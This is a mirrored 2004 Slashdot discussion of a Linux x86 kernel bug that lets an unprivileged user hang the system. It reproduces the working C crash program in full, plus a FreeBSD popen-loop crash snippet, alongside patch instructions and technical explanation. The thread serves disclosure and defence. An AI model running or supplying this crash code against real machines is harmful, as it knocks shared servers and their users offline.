Slashdot Mirror
New Linux Kernel Crash-Exploit discovered
Ant writes " According to linuxreviews article's on 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture. This exploit can be compiled and run without a root access and with a shell access. There are detailed information and source code mentioned. " You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read article for the full details.
There are goods and bads, however, the information is readily available. There are patches that "work", even before a full explanation is available. Now, thousands of people are actively working on a solution, if they so choose. If they don't choose, they can use the proprietary code method - wait for the official vendors to release a patch.
In proprietary land, a vendor would first sue the person who released the information. Then, the re-iteration that you won't be vulnerable if you use a "properly configured firewall," then they'd start working on a fix.
Kinetic stupidity has a new brand leader: Allen Zadr.
It doesn't require external programs in order to crash.
Gnusay -- for all your talking gnu needs.
is to buy a mac and run yellow dog on it!
/ducks
you want us to "read" the article and not jump headfirst into an open source vs. closed source flamewar??? :P
#include <stdio.h>
int main(void)
{
printf("I love Windows\n");
return (0);
}
Gentlemen, the time has come for a serious discussion on whether or not to continue using C for serious programming projects. As I will explain, I feel that C needs to be retired, much the same way that Fortran, Cobol and Perl have been. Furthermore, allow me to be so bold as to suggest a superior replacement to this outdated language.
To give you a little background on this subject, I was recently asked to develop a client/server project on a Unix platform for a Fortune 500 company. While I've never coded in C before I have coded in VB for fifteen years, and in Java for over ten, I was stunned to see how poorly C fared compared to these two, more low-level languages.
C's biggest difficulty, as we all know, is the fact that it is by far one of the slowest languages in existance, especially when compared to more modern languages such as Java and C#. Although the reasons for this are varied, the main reasons seems to be the way C requires a programmer to laboriously work with chunks of memory.
Requiring a programmer to manipulate blocks of memory is a tedious way to program. This was satisfactory back in the early days of coding, but then again, so were punchcards. By using what are called "pointers" a C programmer is basically requiring the computer to do three sets of work rather than one. The first time requires the computer to duplicate whatever is stored in the memory space "pointed to" by the pointer. The second time requires it to perform the needed operation on this space. Finally the computer must delete the duplicate set and set the values of the original accordingly.
Clearly this is a horrendous use of resources and the chief reason why C is so slow. When one looks at a more modern (and a more serious) programming language like Java, C# or - even better - Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.
So what does this mean for the programming community? I think clearly that C needs to be abandonded. There are two candidates that would be a suitable replacement for it. Those are Java and Visual Basic.
Having programmed in both for many years, I believe that VB has the edge. Not only is it slightly faster than Java its also much easier to code in. I found C to be confusing, frightening and intimidating with its non-GUI-based coding style. Furthermore, I like to see the source code of the projects I work with. Java's source seems to be under the monopolistic thumb of Sun much the way that GCC is obscured from us by the marketing people at the FSF. Microsoft's "shared source" under which Visual Basic is released definately seems to be the most fair and reasonable of all the licenses in existance, with none of the harsh restrictions of the BSD license. It also lacks the GPLs requirement that anything coded with its tools becomes property of the
FSF.
I hope to see a switch from C to VB very soon. I've already spoken with various luminaries in the C coding world and most are eager to begin to transition. Having just gotten off the phone with Mr. Alan Cox, I can say that he is quite thrilled with the speed increases that will occur when the Linux kernel is completely rewritten in Visual
Basic. Richard Stallman plans to support this, and hopes that the great Swede himself, Linux Torvaldis, won't object to renaming Linux to VB/Linux. Although not a C coder himself, I'm told that Slashdot's very own Admiral Taco will support this on his web site. Finally,
Dennis Ritchie is excited about the switch!
Thank you for your time. Happy coding.
Let's just hope they're not browsing for pr0n.
here's a direct link to the patch.
;)
not whoring.
... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.
Some questions I have to those who may have been following this:
Does the crash occur without the syscalls in the signal handler/main process?
Does the crash occur on SMP machines?
Does the crash occur with other signals (PIPE, USR1, etc.)
Does the crash occur on ppc, sparc, etc?
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
#include
./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels versions die when evil is executed.
/usr/src/ /usr/src/linux-2.4.26 signal.c-2.4.21.patch.txt) is tested and works for Kernel 2.4.21 (vanilla).
/usr/src/linux-2.4.26 2.4.26-rc3-gentoo.
/usr/src/ /usr/src/linux-2.4.25 "EXTRAVERSION = -rc3-gentoo" /usr/s
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil &&
The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x (vanilla) Kernels
Stian Skjelstad mailed me a working patch 2.4 kernels.
2.4.26
I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
5. Apply the patch
* patch -p1 -d
1. Get a vanilla 2.4.21 kernel and install it.
2. Apply the patch
* patch -p1 -d
I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any Gentoo-only tools.
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d
8. Configure your kernel
* Using your old config: cp
Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
How many systems deployed in real world enviorments give anyone other then IT staff shell access?
DeviantArt Page
NSFW...having programmed in VB for the last 8 years doing kernel level programming...
I think you'll need to clarify that for us slashdot folk.
It must be an exploit in the SCO code that is in the Linux kernel!
;)
... It's ok. remember, not many people know about this yet. ...... ......
Oh God! How to I update Fedora Core 2!!!!
May the Maths Be with you!
Well, those who have been paying attention know that Linux has had quite a few (read: way too many) critical bugs in the past year. Most of them were related to do_mremap (how many times do they have to "fix" that until its fixed?!), varying in severeness from DoS to local root exploits. How many has the Windows kernel had in the last 12 months? I am afraid that this comparison might fall out to the advantage of Windows. Until you take into account time to fix, maybe. Off to patch my systems...
Please correct me if I got my facts wrong.
I thought Monday's were supposed to be Windows patch days, Tuesdays were for Linux, Wednesday was Apache, Thursday was Windows again, Friday was SSH...
The article says it affects x86 (and x86-64) only.
So itanium, ppc, etc. are safe. But my other questions still remain.
Note that the person who reported the bug thought they were triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
go to the trouble to get a paid for shell account at a provider, or a freebie I guess, then run this script, just to destroy their own account basically?
Or is the bigger danger is that this script would be the payload that is included within some linux worm?
Just wondering what this means for joe average home linux user who isn't running a server.
Your sysadmin needs this advice:
If your system is a production server with 1000 on line users then do not test this code on that box.
No, it's not because C is being used here. It's because assembly is being included in the program. If you weren't able to compile the inline assembly, you wouldn't be able to compile this program on a specific system. Plus, you can just create a raw ELF binary that has this assembly instruction in it (if you knew all the opcodes, etc.) and crash a system. This has nothing to do with the language that is being used.
And fixes will be deployed within hours.
The same cannot be said of many proprietary OSes...
The fact that a patch is available doesn't mean that it is a non-issue. In many cases system administrators are too busy, lasy or do not wish to interrupt services, to update their systems to fix these software vulnerabilities. The proprietary vs. non-proprietary argument is irrelevant if administrators fail to keep up-to-date with security fixes. A good example of this was the SQL Slammer worm that made it's rounds several months after a patch that fixed it's attack vector was released.
Simply put, the bigger problem is with the wet-ware than the development methodology.
This can be executed on any webhost with ftp access and a cgi-bin.
Slashdot blurb about Windows bug
Linux trolls: Windows sucks!!!
Slashdot blurb about Linux bug
Linux trolls: Windows sucks!!!
Martin
In the real world, where I work, I run a Hybrid network where I'm still waiting for Windows XP Service Pack 2 to come out in a finalized form because I don't have an option to pull just the parts that I need, and SP2 RC2 is not quite ready to unleash on my network (although I have actively TESTED it). Of course, this just fixes some vulnerabilities that have existed for over a year.
Don't tell me that I, as a Windows User and Administrator, don't care. While I've ignored this kernel issue over the weekend, I get to actively compile come kernel patches and test those. I'll bet, even before my testing, that I'll be able to have a production solution by tomorrow. Even if SP2 releases this afternoon, I'll still have to test it before deployment, so the Linux solution will be in production first.
Kinetic stupidity has a new brand leader: Allen Zadr.
FTFA (From The Fine Article):
``This doesn't affect NetBSD Stable.''
The exploit code also doesn't work on Windows 95, nor on Menuet. I haven't tested SkyOS, because I don't have a license.
Please correct me if I got my facts wrong.
Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:
So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
Don't get me wrong, I enjoy Linux, but keep in mind, the article is 3 days old.
Also, how will I be to apply the patch and where is it? Do I have to recompile my kernel?
If this were a Windows bug, it would have been thoroughly exploited, made the news, and I would have already applied the patch by clicking "Windows Update". A bigger deal would have been made of it, but it would have only taken about a minute of my time.
I do prefer Linux, but we need to be open-minded.
I ran this code on "2.6.5-gentoo-r1 #4 SMP Thu May 27 19:12:27 GMT 2004 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux" and although it didn't crash, gnome started acting all odd, and none of the terminals were responsive. They just kept printing out the prompt. Still, I could browse slashdot while the code was running, and could run some applications. Although when I went to open another terminal it opened 6.
Very vital question for the UML virtual server leasing cottage industry and the customers of same.
If this were to be run on a UML session, what would happen? Would the damage be limited to that UML session, or would the host machine go down?
FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.
He, who dies with the most toys, wins
How do we blame Micro$oft for this?
As for this bug, don't start bashing Linux left and right. Linux isn't perfect, no software is. But unlike when there is a bug in windows a fix is on the way as fast as possible. In fact, there is a patch on the site right now! And for you zealots who say stuff like "No big deal, who is going to do that? No the kind of person you give shell access to." shut up. Admit that Linux is not the perfection in computing.
You know what else makes the kernel crash? At least if you are using 2.6.5 or higher if you enable APIC/APIC-IO and you have an nforce chipset the system will lock up as soon as you do too much I/O.
Well it is Microsoft's fault for saying that IE and such are part of the OS, but Windows has had very few kernel exploits in the most recent few years; it is mostly IE holes and, prior to IIS 6, IIS holes.
This was made worse by the fact that many people run as admin and IIS used to run as LocalSystem on default installs.
However all software has bugs; this incident is neither proof positive or proof negative of any argument re: open source vs closed source.
Natural != (nontoxic || beneficial)
Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC. Outlook Express exploits, MSN Messenger exploits, BlackICE exploits, RPC exploits, IIS exploits, IE exploits. You can even root them in masse without even gaining initial access to the box. This linux exploit allows you to crash the box if you have an account. What moron paying for a shell account is going to do that? Or what type of cracker is going to give himself away simply to crash the box?
I guess everybody missed the sarcasm.
This sig is the express property of someone.
The article doesn't attempt to explain anything.
(Someone please correct me if I have this wrong)
After poking around in the LKML, I've mostly figured it out.
The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the exception is attempted to be delivered to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a non-existant instruction. The exception handler would jump off into space trying to deliver SIGFPE...
So they changed __clear_fpu (which is called when doing a initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.
Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
It's good reading for anybody interested, however, unlike slashdot, registration is required.
Kinetic stupidity has a new brand leader: Allen Zadr.
I year or two ago, this simple program used to do the same for FreeBSD:
#include <stdio.h>
main() {
FILE *f;
while (1) {
f = popen("date","r");
}
}
``Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC.''
Yes, and who says these aren't present on Linux systems? Do you claim that all Linux distros have been as heavily assaulted as Windows, and kept up? I don't think so, and therefore I don't think we can say anything about the security of a Linux + libs + apps system.
Please correct me if I got my facts wrong.
Assume I was drunk when I posted this.
Mind you, at the risk of replying to myself it is worth noting that the patch currently available actually does nothing more meaningful than checking to see if the code that got you there is this exact exploit or not... so I would expect a better patch to be coming out that actually deals with the real problem, which appears to be that some poor munchkin started to write an FPU exception handler somewhere near version 2.3 and got distracted before finishing it. I assume though that the production of such a patch implies working out what the dude actually meant to do, first.
This bug was posted on slashdot as a comment reply to the Assembly programing article a few days ago. I looked at it then and it locked up my machine nicely.
Aside from that, I don't know that your point is valid. Most linux users either know how to use patch and compile their own kernels, or can run up2date or whatever to download their latest prefab clutter. Also worth pointing out is this bug needs a shell to run the program and crash the system. If you're giving out shells and don't know how to use patch, this is the least of your worries.
The patch is linked from another comment in this thread and yes, you'll have to recompile your kernel. No one has access to my machines here but me so I'm not going to bother updating until 2.6.7 is released. Have a good one.
God I wish I could edit posts.
The issue isn't that the context is gone... the issue is that the kernel is executing a non-waiting FPU instruction i.e. "fwait" on returning from the a context that flushes a user thread (i.e. return from signal handler, syscall after execve). Triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.
What's really weird is I found this document, which details the potential problems of trying to use the FPU in a interrupt handler in the Linux kernel.
They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...
Well, you can't really call it that, though. It's was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set, and you're NOT a user thread. That's what gets you burned here.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
So, it's been fixed in XP SP1. Months after the flaw was reported, and with a woefully incorrect knowledge base article too.
Also, it hasn't been fixed in NT4, and it hasn't officially been fixed in 2000 either, although it seemed to go away after Win2K SP3.
I suppose the answer is not allow access to a compiler for non-trusted shell users.
Please do not forget to deny using keyboard keys representing hexadecimal digits, i.e. A-F and 0-9 to untrusted users.
There you are, staring at me again.
Did you actually read it? I think it was the best troll parody I've seen for a while. I mean, the author clearly understood exactly what he was talking about when discussing C's support for pointers, which means that the way he missed the point and described them as 'inefficient' is marvelous.
Also, in light of recent events concerning the ADTI 'Samizdat' book & the author getting Tanenbaum's nationality wrong, describing Linus Torvalds as a Swede is a masterstroke.
The thing about Windows bugs is that many of them are remotly exploitable by unprivileged users; in order to exploit bugs like this, and in fact any root compromise that I know of, you need to first get a shell on the machine. Much harder than throwing up a web page or sending out a trojaned email.
--
I Hit the Karma Cap, and All I Got Was This Lousy
I have a "very nearly vanilla" 2.4.26 kernel - all that's patched are some netfilter things for more targets. This patch didn't work for me - the patch went fine (my signal.c is no different from vanilla), and the resulting kernel booted fine, but the exploit still crashed my box. I'm using gcc-2.95.4 , Debian 3.0 (Woody). No I didn't forget to run lilo or whatever (i'm using Grub). Any ideas?
That's not much of a solution; I'd just compile the binary on another system with matching library versions and then upload and execute it on your machine.
Here's how:
Add compiler group:
Move to correct directory:
Make most common compilers part of the compiler group
Set permissions
To add users to the group, modify and change to '123' will be different on your installation.
Again, don't think this is a fix for the exploit. It's just a good little step in securing a box.
"I filter at +6, and have yet to miss out on an important comment." (#822545)
Question for the kernel gurus out there -- I read the article and the patch (so sue me), and it seems to me that the patch just redirects the signal-handler flow if sig==8.
This may well protect against the example exploit, but what happens if you get a floating-point exception in the handler for some other signal?
The provided patch does not look like a real fix, unless the deeper bug really does just involve sig==8.
2*3*3*3*3*11*251
The update may be avaliable faster than Windows, but you cannot say that it is /easier/ to apply than a Windows patch. I hate recompiling my kernel, it always takes me a number of attempts until everything works. Also my server is running Linux and is serving two houses of people with net access, I can't just take it down and mess around with it for hours while I have fun trying to get a working kernel. So regardless of when the patch was released I still need to wait until later tonight to apply the patch.
I spent ages trying to think of sig, but never did
For a moment I thought you were serious, as I read the first 2 lines of your post ... I felt this venom building up inside me. They I saw, you thread was maked funny. What a relief.
So who is serious enough about security to want this patched, but stupid enough to just accept a patch from any of thousands of developers? Yes you could evaluate the source of each patch and recompile using th new code, but who has time for that? Open Source and proprietary software are no different in terms of patches. If you don't get it straight from the horse's mouth then you are not following very good security procedure.
After all, doesn't anyone remember this? You can find open source patches for proprietary software every once in a while too, but you would be nuts to trust them.
Lessons learned: (1) use Linux and keep it up-to-date with apt-get; (2) in the games partition which runs windows, *never* patch anything.
Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
*shrug*
If you maintain a Linux system for a larger group of people, you should know what you are doing. Pardon me, but obviously you're not. .config from 2.6.4, then answering a few questions for new options) brain involved: 1%, well documented in case of doubt. ../kernel....: 10 seconds, brain involved: 0%. :P
...
As soon as I read this I upgraded our Firewall at work. I downloaded the latest 2.6, got the patch from the bottom of the linuxreviews site. That took about 4 minutes on a somewhat fast internet connection.
Extracting the Kernel and patching it: 1 minute, brain involved: none (patch howto on that page as well, besides, if you are a real sysadmin you'll be able do kernel patches single fingered).
Configuring the kernel: 1 minute as well, using make oldconfig (porting over my
Compiling: make-kpkg kernel_image: 10 minutes, brain involved: 0%.
Installing: dpkg -i
Rebooting: about 1.5 minutes, brain involved: how fecking hard can it be to type 'shutdown -r now' ? or maybe even 'reboot'
This also answers the other posting where somebody was whining about making the updates moronproof... Most distros have this 'feature', autoupdating, Redhat: up2date, Debian: apt (through security.debian.org),
This is a reasonably serious bug. A well-configured *nix box should not be crashable by anything a normal user can do. The amount of memory a user can allocate, the number of processes they can launch, the size and number of files they can create should all be limited through user limits. There is no way (AFICS) to prevent this bug being exploited through those kind of limits. If there are lots of people logged in, figuring out who crashed the box would be quite hard - just have the crashing program delete itself before it crashes the box.
Hitting ctrl-alt-delete or the power requires physical access, which shell users almost never have (I don't even know where most of the computers I use every day are - they could be in Timbuktu for all I care).
Granted, this crashme program, which requires local shell access, does seem to work in some cases.
However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.
I see comments about how it only took a few days for the open source community to respond to this bug. In a comment made by Ayanami Rei, an article is linked that is dated December 12, 2003 that details this problem. Isn't that a 6-month response time to this issue? It would appear that Linux is subject to the same patching issues as MS is, even though the reasons are a bit different.
#include
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
write(2, "*", 1);
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
by simply commenting out the inline assembly, i fixed crash.c so it can no longer crash Linux!
1 2 1 2 THE NAKEN CREW
by typing:
at the bash-prompt :-)
ref.url : http://forums.gentoo.org/viewtopic.php?t=67302
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
help ulimit
How am I supposed to keep up with this stuff?
My beliefs do not require that you agree with them.
My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.
11*43+456^2
http://linux.bkbits.net:8080/linux-2.5/diffs/inclu de/asm-i386/i387.h@1.16?nav=index.html|src/.|src/i nclude|src/include/asm-i386|hist/include/asm-i386/ i387.h
The *first* post I see is some bullshit lauding the superiority of the opensource development process with this as an example. RTFA. Here is some sensible info and advice.
1. There *was no patch*. Some systems were immune, but that was completely by chance.
2. There is a patch *now*, but the article also says people are already using the thing to crash free shell providers on day 0.
3. The patch, at this point, requires a kernel recompile. Not everyone running linux knows how to do that. Many who do are too lazy. Don't give me some shit about how everyone running linux is so 1337 that they will be sure the have already patched their system. I know you. You aren't that 1337.
4. Yes, this *is* a big deal. We were caught with our pants down, plain and simple. This *is* worse than any windows security issue that has come up in a long time.
5. Please *do* compile the demo code against your system and test it. If your system crashes, please patch. Don't act like many and just ignore this, especially if you are running a server or anything that stays connected for any amount of time. It also might be a good idea to turn off your telnet and ssh daemon (yes, even ssh) until you patch.
6. If you are *not* running linux or not running on x86, it might also be a good idea to test the demo code against your system. If you are running windows, some versions of windows *do* support possix to a limited degree. The code *might* compile. Then there is also, cygwin. This is probably a bug specific to linux x86, but it won't hurt to check.
The name's grahamlee. I was using a word from the english language and taking it to mean that which is its accepted meaning. It's even written as such in the dictionaries.
That's a load of rubbish; all computers since the dawn of time have certainly not been exclusively von Neumann computers (as distinct from von Neumann machines, of course). Note all of the computers that employ the Harvard architecture. And I doubt you can conveniently ignore those unless you never ever intend to use a DSP (ever). The Harvard architecture is named after the Harvard Mark I (a.k.a. IBM ASCC), and one of its programmers was a certain Grace Hopper. She went on to big things, you know.
You mean Neumann János? [I'm not happy that a paid-for title should necessarily be honoured.] I wonder whether he was able to see the word 'nonzero' written down without trying to invent a new meaning for it....probably. Anyway, the achievements or otherwise of a Hungarian mathematician have little bearing on your version of the word nonzero's definition, which of course comes from the Old French / Latin prefix "non-" and the Arabic "çifr". Not that your definition isn't necessarily valid in some field, I'm sure it is. It's just that the previous (c. 1879) definition already has a lot of inertia everywhere else, because people know that that is what the word means.
For Linux, choice of:
I'd like to see a TwoKernelMonte variant for SMP which allowed you to isolate one processor from the kernel, bring up a patched version of the same kernel under it in cooperation with the running kernel (which process would presumably not survive any changes in in-memory structures, so check for that first), migrating devices across in idle moments, then finally deleting the old kernel and bonding the processor thus freed to the new kernel. Viola, new kernel sans reboot. Ideal for a patching situation.
Got time? Spend some of it coding or testing